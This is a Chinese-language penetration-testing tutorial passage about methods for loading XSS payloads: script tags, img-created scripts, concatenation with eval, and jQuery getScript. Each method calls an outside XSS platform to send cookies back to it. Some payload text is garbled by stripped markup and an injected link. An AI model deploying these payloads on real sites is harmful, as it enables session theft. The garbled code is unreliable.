#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法] xss漏洞加载payload|jquery的xss漏洞

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！

文章目录

- 一、xss漏洞测试-加载payload的方法
- - 1、背景
  - 2、xss平台通用payload加载
  - 3、img 创建script标签加载
  - 4、字符并接加载
  - 5、jquery加载

一、xss漏洞测试-加载payload的方法 1、背景
（1）当我们在测试xss漏洞的时候，一般都是用h1、script等简单的html标签进行测试样式是否改变或是否弹窗，来检验是否存在xss漏洞。
（2）当在利用这个xss漏洞获取信息的时候就要加载payload，加载payload的方法多种多样，以下是常用的加载技巧。
2、xss平台通用payload加载
（1）有一些 xss平台已经有一些通用的方法。直接拿到用就可以了。

#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]

文章图片

文章图片

（2）标准script加载到留言板

payload-1： =http://www.xssplatform.com/7Kar>payload-2： =//www.xssplatform.com/7Kar>

文章图片

（3）反弹cookie信息到xssplatform平台

文章图片

3、img 创建script标签加载
（1）payload：不适用于存储型

文章图片（3）反弹cookie信息到xssplatform平台文章图片 4、字符并接加载（1）这种一般是输入的字符有限制的时候使用 >z='document.' >z=z+'write("' >z=z+' >z=z+' src=https://www.it610.com/article/ht' >z=z+'tp://www.' >z=z+'xssplatform' >z=z+'.com/7' >z=z+'Kar> >z=z+'ript>")' >eval(z) （2）加载payload到留言板文章图片（3）上面的留言板没有生效，我们可以直接把该payload放到本地服务器下的demo2.html内进行测试文章图片文章图片 5、jquery加载（1）加载公有js库，然后利用jquery语法创建一个script标签 ="http://code.jquery.com/jquery-1.9.1.min.js"> >$.getScript("//www.xssplatform.com/7Kar"); 【#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]】（2）加载payload到留言板文章图片（3）反弹cookie信息到xssplatform平台文章图片推荐阅读佳能废墨仓在哪里打开的啊-佳能g580废墨仓在哪个位置海信日立空调不启动是什么原因造成的核桃什么时候吃最好呢酒糟鼻激光治疗有副作用吗高清视频下载，最高清的视频下载网站高速幽灵堵车高速路上的幽灵车是什么车 Flutter与一些常用的Dart语法登陆与未登录两种情况叫什么登录是什么意思菩提子批发哪里最便宜？菩提子批发多少钱一斤老年人失眠如何用药乾隆穿越的小说有吗网络用语kpi是什么意思业绩的意思饭圈中有讽刺意味二手相机去哪买？海虾怎么养殖？海水虾怎么养殖吊兰叶尖发黄要剪掉吗寻亲记丨五彩石 ppt背景音乐怎么设置？ java中的单选框代码，javaweb单选框筋膜枪能瘦小腿肌肉吗免费追剧影视大全电视剧免费观看电视剧大全下载 #|VUE_数据修改后调用 this.$nextTick Leetcode|21. 合并两个有序链表 #|时序预测 | MATLAB实现时间序列回归之似然检验 #|时序预测 | MATLAB实现时间序列回归之测试检验 #|时序预测 | MATLAB实现时间序列回归之Bootstrapped测试自动化测试|【Appium实战】如何使用mumu模拟器模拟安卓手机 #|Widerface数据集 | widerface数据集转成YOLO格式 #|vue-cli3.0 使用postcss-plugin-px2rem（推荐）和 postcss-pxtorem（postcss-px2rem）自动转换px为rem 的配置方法数据结构与算法|位运算各种方法总结